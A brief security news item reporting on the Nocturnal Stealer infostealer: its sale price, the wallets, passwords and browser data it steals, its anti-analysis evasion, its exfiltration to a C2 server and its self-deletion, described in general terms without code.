Nocturnal Stealer malware harvests sensitive info

1 Min Read

Nocturnal Stealer malware is available for sale through Deep Web sources, for the low price of 25$.

It steals 28 different kinds of cryptocurrency wallets, FileZilla FTP saved passwords, and Chrome and Firefox information including logins, cookies, web data and autofill data. Also it provides various detailed information to attacker including, IP adress, OS, architecture and hardware information.

This malware utilizes anti-VM and anti-analysis techniques, so it is harder to research and dissect by security researchers. Nocturnal Stealer copies stolen information into plaintext files that are named “passwords” and “information”, when it starts up the communication with the C2 server, sending harvested information in multi-part HTTP POST form.

When harvesting and sending information to server is done, it runs a simple command that terminates itself from victim machine, and victim hardly can notice that information has been compromised by malware.

Share This Article
Leave a comment